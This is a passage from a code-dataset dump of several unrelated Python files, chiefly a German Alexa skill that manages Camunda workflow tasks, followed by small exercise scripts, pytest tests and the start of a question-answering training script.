Aufgabe fehlschlägt\"\"\"\n return (\n handler_input.response_builder\n .speak(\"ich konnte deine aufgabe leider nicht abschließen.\")\n .set_should_end_session(False)\n .response\n )\n\n\ndef no_task_assigned(handler_input):\n \"\"\"Wenn dem Nutzer noch keine Aufgabe zugewiesen ist, er aber mit ihr interagieren möchte\"\"\"\n return (\n handler_input.response_builder\n .speak(\"frage mich zuerst, was deine aufgabe ist.\")\n .set_should_end_session(False)\n .response\n )\n\n\ndef no_or_new_task():\n \"\"\"Standard Prozedur nach dem Abschließen einer Aufgabe\"\"\"\n get_current_task(assignee=current_user)\n\n if current_task is None:\n claim_new_task(candidateGroup=current_group, assignee=current_user)\n\n if current_task is None:\n return \"ich habe deine aufgabe abgeschlossen. aktuell gibt es keine weiteren verfügbaren aufgaben.\"\n else:\n return f\"ich habe deine aufgabe abgeschlossen. 
deine neue aufgabe ist: {current_task['name']}. {current_task['description']}\"\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler für den Start des Skills. Wird bei jedem Start des Skills aufgerufen.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n speak_output = f\"hallo {current_user}! ich bin dein virtueller assistent und helfe dir mit allem rund um deine aufgaben. was möchtest du tun?\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass AufgabeDetailsIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Aufgabendetails. Gibt, wenn vorhanden, die Details zur Aufgabe zurück\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeDetailsIntent\")(handler_input)\n\n def handle(self, handler_input):\n get_current_task(assignee=current_user)\n\n if current_task is None:\n claim_new_task(candidateGroup=current_group, assignee=current_user)\n\n if current_task is None:\n speak_output = \"aktuell gibt es keine verfügbaren aufgaben.\"\n else:\n speak_output = f\"deine aufgabe ist: {current_task['name']}. {current_task['description']}\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Generischer Abschluss\nclass AufgabeAbschlussIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Abschluss von Aufgaben. Generischer Abschluss von Aufgaben hier möglich. \n Jeder Aufgabentyp des Prozesses kann hiermit abgeschlossen werden.\n Angepasste Logik für den Abschluss von \"zahlungsart bestimmen\".\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeAbschlussIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] != \"bestellung servieren\":\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json={})\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n except:\n return complete_task_failed(handler_input)\n else:\n slot_confirmation_status = handler_input.request_envelope.to_dict(\n )['request']['intent']['slots']['direkt']['confirmation_status']\n if slot_confirmation_status == \"NONE\":\n speak_output = \"hat der gast direkt bezahlt?\"\n directive = ConfirmSlotDirective(\n updated_intent=Intent(\n name=\"AufgabeAbschlussIntent\",\n slots={\n \"direkt\": Slot(\n name=\"direkt\",\n value=\"true\")\n }),\n slot_to_confirm=\"direkt\")\n return (\n handler_input.response_builder\n .add_directive(directive)\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n else:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"true\"\n }\n }\n }\n if slot_confirmation_status == \"DENIED\":\n request_body['variables']['direkt']['value'] = \"false\"\n\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n except:\n return complete_task_failed(handler_input)\n\n speak_output = no_or_new_task()\n\n return (\n handler_input.response_builder\n 
.speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass WagenVorbereitenIntentHandler(AbstractRequestHandler):\n \"\"\"An den Task \"service-wagen vorbereiten\" angepasster Handler.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"WagenVorbereitenIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"service-wagen vorbereiten\":\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json={})\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass ServierenIntentHandler(AbstractRequestHandler):\n \"\"\"An den Task \"bestellung servieren\" angepasster Handler.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"ServierenIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung servieren\":\n slot_confirmation_status = handler_input.request_envelope.to_dict(\n )['request']['intent']['slots']['direkt']['confirmation_status']\n if slot_confirmation_status == \"NONE\":\n speak_output = \"hat der gast direkt bezahlt?\"\n directive = ConfirmSlotDirective(\n updated_intent=Intent(\n name=\"AufgabeAbschlussIntent\",\n slots={\n \"direkt\": Slot(\n name=\"direkt\",\n value=\"true\")\n }),\n slot_to_confirm=\"direkt\")\n return (\n handler_input.response_builder\n .add_directive(directive)\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n else:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"true\"\n }\n }\n }\n if slot_confirmation_status == \"DENIED\":\n request_body['variables']['direkt']['value'] = \"false\"\n\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n \n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass ZahlungSofortIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe \"zahlungsart bestimmen\", Gast zahlt sofort.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"ZahlungSofortIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung servieren\":\n 
try:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"true\"\n }\n }\n }\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass ZahlungSpaeterIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe \"zahlungsart bestimmen\", Gast zahlt später.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"ZahlungSpaeterIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung servieren\":\n try:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"false\"\n }\n }\n }\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass BestellungZubereitenIntentHandler(AbstractRequestHandler):\n \"\"\"An den Task \"bestellung-zubereiten\" angepasster Handler.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"BestellungZubereitenIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung zubereiten\":\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json={})\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\nclass AufgabeVorIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe überspringen. 
Generischer Handler.\n Alle Aufgaben lassen sich damit überspringen.\n Entweder die nächste, zugewiesene aufgabe wird zugewiesen oder die neuere aufgabe, die dem nutzer bereits zugewiesen wurde, wird ausgegeben.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeVorIntent\")(handler_input)\n\n def handle(self, handler_input):\n global current_task\n\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n try:\n alle_meine_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?assignee={current_user}&sortBy=created&sortOrder=asc\")\n if alle_meine_tasks_request.status_code != 200:\n raise Exception(\"Request failed\")\n alle_meine_tasks = alle_meine_tasks_request.json()\n if len(alle_meine_tasks) > 1:\n next_task_index = alle_meine_tasks.index(current_task) + 1\n if next_task_index > (len(alle_meine_tasks) - 1):\n return (\n handler_input.response_builder\n .speak(f\"es gibt keine neuere aufgabe. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n # unclaim, egal bei fail\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/unclaim\", json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current task\")\n\n current_task = alle_meine_tasks[next_task_index]\n return (\n handler_input.response_builder\n .speak(f\"ich habe deine aufgabe übersprungen. deine neue aufgabe ist: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n else:\n date = current_task['created']\n date = date.replace(\"+\", \"%2B\")\n\n newer_unassigend_service_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?candidateGroup={current_group}&unassigned=true&createdAfter={date}&sortBy=created&sortOrder=asc\")\n if newer_unassigend_service_tasks_request.status_code != 200:\n raise Exception(\"Request failed\")\n if len(newer_unassigend_service_tasks_request.json()) > 0:\n new_task = newer_unassigend_service_tasks_request.json()[0]\n r = requests.post(\n f\"{camunda_url}/rest/task/{new_task['id']}/assignee\", json={\"userId\": current_user})\n if r.status_code != 204:\n raise Exception(\"Unable to assign new task\")\n\n # unclaim, egal bei fail\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/unclaim\", json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current taks\")\n\n get_current_task(assignee=current_user)\n speak_output = f\"ich habe deine aufgabe übersprungen. deine neue aufgabe ist: {current_task['name']}. {current_task['description']}\"\n else:\n speak_output = f\"es gibt keine neuere aufgabe. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response)\n except:\n logger.info(\"Unable to get new task\")\n return (\n handler_input.response_builder\n .speak(f\"ich konnte dir keine neue aufgabe zuweisen. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n\n\nclass AufgabeZurueckIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe zurück, wird nach einem überspringen aufgerufen.\n Funktioniert allerdings nicht in jedem Fall. Bspw. 
wenn eine viel aktuellere aufgabe zuvor zugewiesen wurde.\n \"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeZurueckIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n try:\n date = current_task['created']\n date = date.replace(\"+\", \"%2B\")\n\n older_unassigned_service_tasks_request = requests.get(\n f'{camunda_url}/rest/task?candidateGroup={current_group}&unassigned=true&createdBefore={date}&sortBy=created&sortOrder=asc')\n if older_unassigned_service_tasks_request.status_code != 200:\n raise Exception(\"Request failed\")\n logger.info(older_unassigned_service_tasks_request.json())\n len_list = len(older_unassigned_service_tasks_request.json())\n logger.info(len_list)\n if len_list > 0:\n new_task = older_unassigned_service_tasks_request.json()[\n len_list - 1]\n r = requests.post(\n f\"{camunda_url}/rest/task/{new_task['id']}/assignee\", json={\"userId\": current_user})\n if r.status_code != 204:\n raise Exception(\"Unable to assign new task\")\n\n # unclaim, egal bei fail\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/unclaim\", json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current taks\")\n get_current_task(assignee=current_user)\n speak_output = f\"okay. deine aufgabe ist: {current_task['name']}. {current_task['description']}\"\n else:\n speak_output = f\"es gibt keine freie ältere aufgabe. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response)\n except:\n logger.info(\"Unable to get old task\")\n return (\n handler_input.response_builder\n .speak(f\"ich konnte dir die aufgabe nicht zuweisen. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n\n\nclass AufgabeFreigebenIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Freigabe von Aufgaben.\n Generisch, geht mit jeder Aufgabe.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeFreigebenIntent\")(handler_input)\n\n def handle(self, handler_input):\n get_current_task(assignee=current_user)\n\n try:\n # unclaim, wenn current_task == NOne, kein problem wegen try catch\n r = requests.post(\n f'{camunda_url}/rest/task/{current_task[\"id\"]}/unclaim', json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current task\")\n speak_output = \"ich habe deine aufgabe freigegeben.\"\n except:\n speak_output = \"ich konnte deine aufgabe nicht freigeben.\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response)\n\n\nclass AufgabeUebergabeIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Übergeben von Aufgaben an andere Personen. 
An sich generisch, aber man muss die Personen angeben.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeUebergabeIntent\")(handler_input)\n\n def handle(self, handler_input):\n get_current_task(assignee=current_user)\n person = ask_utils.request_util.get_slot_value(\n handler_input, \"person\") # this slot is required!\n if (person != \"julian\" and person != \"felix\" and person != \"anna\"):\n return (\n handler_input.response_builder\n .add_directive(ElicitSlotDirective(slot_to_elicit=\"person\"))\n .speak(f\"{person} kenne ich nicht. du kannst die aufgabe an julian oder felix übergeben. an wen möchtest du die aufgabe übergeben?\")\n .ask('an wen möchtest du die aufgabe übergeben?')\n .response)\n try:\n alle_person_tasks_request = requests.get(\n f'{camunda_url}/rest/task?assignee={person}&sortBy=created&sortOrder=asc')\n if alle_person_tasks_request.status_code != 200:\n raise Exception(\"Unable to retrieve tasks\")\n alle_person_tasks = alle_person_tasks_request.json()\n if (len(alle_person_tasks) < 2):\n r = requests.post(f'{camunda_url}/rest/task/{current_task[\"id\"]}/assignee', json={\n \"userId\": person}) # set assignee without checking\n if r.status_code != 204:\n raise Exception(\"Unable to assign new task\")\n else:\n raise Exception(\"Already two tasks assigned\")\n\n get_current_task(assignee=current_user)\n\n if current_task is None:\n claim_new_task(candidateGroup=current_group,\n assignee=current_user)\n\n if current_task is None:\n speak_output = f\"ich habe deine aufgabe an {person} übergeben. aktuell gibt es keine weiteren verfügbaren aufgaben.\"\n else:\n speak_output = f\"ich habe deine aufgabe an {person} übergeben. deine neue aufgabe lautet: {current_task['name']}. {current_task['description']}\"\n except:\n speak_output = \"ich konnte deine aufgabe nicht übergeben\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Hilfe.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n speak_output = \"du kannst zum beispiel details zu deiner aufgabe erfragen, deine aufgabe abschließen, übergeben oder freigeben. was möchtest du tun?\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Wenn der Nutzer Stopp/Abbruch sagt.\"\"\"\n\n def can_handle(self, handler_input):\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n speak_output = \"bis bald!\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler für Ende der Session.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n global current_task\n current_task = None\n\n return handler_input.response_builder.response\n\n\nclass IntentReflectorHandler(AbstractRequestHandler):\n \"\"\"The intent reflector is used for interaction model testing and debugging.\n It will simply repeat the intent the user said. 
You can create custom handlers\n for your intents by defining them above, then also adding them to the request\n handler chain below.\n \"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_request_type(\"IntentRequest\")(handler_input)\n\n def handle(self, handler_input):\n intent_name = ask_utils.get_intent_name(handler_input)\n speak_output = \"You just triggered \" + intent_name + \".\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n\n def can_handle(self, handler_input, exception):\n return True\n\n def handle(self, handler_input, exception):\n logger.error(exception, exc_info=True)\n\n speak_output = \"das habe ich leider nicht verstanden. kannst du das bitte wiederholen?\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors you've\n# defined are included below. The order matters - they're processed top to bottom.\n\n\nsb = SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(AufgabeAbschlussIntentHandler())\nsb.add_request_handler(WagenVorbereitenIntentHandler())\nsb.add_request_handler(ZahlungSpaeterIntentHandler())\nsb.add_request_handler(ZahlungSofortIntentHandler())\nsb.add_request_handler(ServierenIntentHandler())\nsb.add_request_handler(BestellungZubereitenIntentHandler())\nsb.add_request_handler(AufgabeDetailsIntentHandler())\nsb.add_request_handler(AufgabeVorIntentHandler())\nsb.add_request_handler(AufgabeZurueckIntentHandler())\nsb.add_request_handler(AufgabeFreigebenIntentHandler())\nsb.add_request_handler(AufgabeUebergabeIntentHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\n# make sure IntentReflectorHandler is last so it doesn't override your custom intent handlers\nsb.add_request_handler(IntentReflectorHandler())\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nlambda_handler = sb.lambda_handler()\n","sub_path":"thesis-msi/thesis-prototyp/alexa-skills/aufgaben_anna/lambda/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":31606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"412947060","text":"# テキストのファイルを開く\nf = open(\"alice.txt\", \"r\", encoding=\"utf-8\")\n\n# 言い換えディクショナリを作成\ntrans = { 't':'i', 'l':'I', 'O':'0'}\n\n# ファイルを 1行ずつ処理する\nfor line in f:\n s = ''\n for c in line:\n if c in trans:\n s = trans.get(c)\n else:\n s = c\n print(s)\n\nf.close()\n","sub_path":"1612/161227_kadai3-1.py","file_name":"161227_kadai3-1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"439948365","text":"# ##################################################################################################\n# Copyright (c) 2020 - Fundação CERTI\n# All rights reserved.\n# ##################################################################################################\n\nimport numpy\nimport pytest\nfrom qda_modelos import cyanobacteria\n\n\nclass TestCyanobacteriaDashEtAl2011:\n def test_expected_result_type(self, setup_bands):\n R20m_bands = setup_bands[\"20m\"]\n\n dash_et_al_2011_result = cyanobacteria.dash_et_al_2011(\n R20m_bands[\"B03\"], R20m_bands[\"B02\"]\n )\n\n assert isinstance(dash_et_al_2011_result, numpy.ndarray)\n\n def test_expected_result_shape(self, setup_bands):\n R20m_bands = setup_bands[\"20m\"]\n\n dash_et_al_2011_result = cyanobacteria.dash_et_al_2011(\n R20m_bands[\"B03\"], R20m_bands[\"B02\"]\n )\n\n assert dash_et_al_2011_result.shape == R20m_bands[\"B03\"].shape\n\n def test_expected_error_for_wrong_number_of_bands(self, setup_bands):\n B03 = setup_bands[\"20m\"][\"B03\"]\n\n with pytest.raises(TypeError):\n cyanobacteria.dash_et_al_2011(B03)\n\n def test_expected_error_for_bands_of_different_shapes(self, setup_bands):\n B03 = setup_bands[\"20m\"][\"B03\"]\n B02 = setup_bands[\"10m\"][\"B02\"]\n\n with pytest.raises(ValueError):\n cyanobacteria.dash_et_al_2011(B03, B02)\n","sub_path":"tests/test_cyanobacteria_dash_et_al_2011.py","file_name":"test_cyanobacteria_dash_et_al_2011.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"163488553","text":"# 문제: https://programmers.co.kr/learn/courses/30/lessons/42583\n\ndef solution(bridge_length, weight, truck_weights):\n answer = 0\n on_bridge = [0] * bridge_length\n \n while len(on_bridge):\n answer += 1\n on_bridge.pop(0)\n if truck_weights:\n if sum(on_bridge) + truck_weights[0] <= weight:\n on_bridge.append(truck_weights.pop(0))\n else:\n on_bridge.append(0)\n \n return answer\n \n","sub_path":"스터디2주차/다리를지나는트럭.py","file_name":"다리를지나는트럭.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"77049568","text":"def isPrime(x):\n for n in range(2,x):\n if x%n is 0:\n return False\n return True\n\ncont = 0\n\nfor h in range(2,10000000):\n if isPrime(h) is True:\n cont=cont+1\n print(h, cont)\n if cont is 10001:\n print(\"found it:\",h,cont)\n break","sub_path":"problems001to099/Problem07.py","file_name":"Problem07.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"362318196","text":"import urllib.request, urllib.parse, urllib.error\n\nimg = urllib.request.urlopen('http://data.pr4e.org/cover3.jpg')\nman_a = open('portada.jpg', 'wb')\ntamano = 0\nwhile True:\n info = img.read(100000)\n if len(info) < 1: break\n tamano = tamano + len(info)\n man_a.write(info)\n\nprint(tamano, 'caracteres copiados.')\nman_a.close()\n","sub_path":"code3/curl2.py","file_name":"curl2.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"377415479","text":"import sys\nimport Line_Point\n\n'''\nfor each input line L\n repeat count times\n rotate L counter clockwise about the origin by angle\n scale L about the origin by factor\n translate L horizontally by delta_x\n translate L vertically by delta_y\n print L to stdout\n\npreconditions\n\teach file in stdin is a legal lines file\n'''\n\nvar_list = ['angle', 'factor', 'count', 'delta_x', 'delta_y']\noption_map = {'angle':'-a', 'factor':'-f', 'count':'-n', 'delta_x':'-x', 'delta_y':'-y'}\noption_vals = {'-a':'0.0','-f':'1.0','-n':'1','-x':'0.0','-y':'0.0'}\n\noptions_list = []\nfiles_list = []\n\n# break command line input into options list and files list\nstart_options = end_options = i = 1\nwhile(i> sys.stderr, 'Duplicate option:', option\n sys.exit() \n else:\n print >> sys.stderr, 'Illegal option:', option\n sys.exit()\n\n# assign option values to relevant variables, check for valid values\nfor variable in var_list:\n value = option_vals[option_map[variable]]\n try:\n if variable == 'count' or variable == 'spoke':\n globals()[variable]=int(value)\n else:\n globals()[variable]=float(option_vals[option_map[variable]])\n except ValueError:\n print >> sys.stderr,'Illegal option value:',option_map[variable],option_vals[option_map[variable]]\n sys.exit() \n\n# read lines from files and perform rotate, scale, translate on them\nif len(files_list)>0:\n for file in files_list:\n try:\n \tf = open(file,'r')\n except IOError:\n \tprint >> sys.stderr, 'Cannot open file:', file\n \tsys.exit()\n for x in f:\n \tx = x.replace('\\n', '') # remove line terminator: Linux\n \tx = x.replace('\\r\\n', '') # remove line terminator: Windows\n with open(file) as open_file:\n file_data = open_file.readlines()\n for file_line in file_data:\n L = file_line.split()\n point0 = Line_Point.Point(float(L[1]), float(L[2]))\n point1 = Line_Point.Point(float(L[3]), float(L[4]))\n line = Line_Point.Line(point0, point1)\n for i in range(count):\n line.rotate(angle)\n line.scale(factor)\n line.translate(delta_x,delta_y)\n print ('line', line)\n \n \n# read lines from stdin and perform rotate, scale, translate on them\nelse: \n for line in sys.stdin:\n L = line.split()\n point0 = Line_Point.Point(float(L[1]), float(L[2]))\n point1 = Line_Point.Point(float(L[3]), float(L[4]))\n line = Line_Point.Line(point0, point1)\n for i in range(count):\n line.rotate(angle)\n line.scale(factor)\n line.translate(delta_x,delta_y)\n print ('line', line)\n \n \n \n","sub_path":"rotate_scale_translate.py","file_name":"rotate_scale_translate.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"50035298","text":"import logging\r\nimport os\r\nimport sys\r\nimport wandb\r\n\r\nfrom typing import NoReturn\r\nfrom datasets import load_metric, load_from_disk, DatasetDict\r\n\r\nfrom transformers import AutoConfig, AutoModelForQuestionAnswering, AutoTokenizer\r\nfrom transformers import (\r\n DataCollatorWithPadding,\r\n EvalPrediction,\r\n HfArgumentParser,\r\n TrainingArguments,\r\n set_seed,\r\n)\r\nfrom transformers.trainer_utils import IntervalStrategy\r\n\r\nfrom reader.conv import custom_model\r\nfrom utils.utils_qa import postprocess_qa_predictions, check_no_error\r\nfrom utils.trainer_qa import QuestionAnsweringTrainer\r\nfrom arguments import (\r\n ModelArguments,\r\n DataTrainingArguments,\r\n)\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef main():\r\n\r\n # 가능한 arguments 들은 ./arguments.py 나 transformer package 안의 src/transformers/training_args.py 에서 확인 가능합니다.\r\n # --help flag 를 실행시켜서 확인할 수 도 있습니다.\r\n\r\n parser = HfArgumentParser(\r\n (ModelArguments, DataTrainingArguments, TrainingArguments)\r\n )\r\n model_args, data_args, training_args = parser.parse_args_into_dataclasses()\r\n print(model_args.model_name_or_path)\r\n\r\n # [참고] argument를 manual하게 수정하고 싶은 경우에 아래와 같은 방식을 사용할 수 있습니다\r\n # training_args.per_device_train_batch_size = 4\r\n # print(training_args.per_device_train_batch_size)\r\n training_args.evaluation_strategy=IntervalStrategy.STEPS\r\n training_args.logging_steps=250\r\n training_args.eval_steps=250\r\n training_args.save_total_limit=3\r\n training_args.load_best_model_at_end=True\r\n training_args.metric_for_best_model='em'\r\n\r\n # wandb 설정\r\n # entity는 wandb login으로 자동 설정됩니다. entity를 변경하고 싶으시면 relogin하면 됩니다!\r\n os.environ[\"WANDB_ENTITY\"] = \"채워주세요\" # 프로젝트 명 e.g. bc-ai-it-mrc\r\n os.environ[\"WANDB_PROJECT\"] = \"채워주세요\" # 프로젝트 명 e.g. 
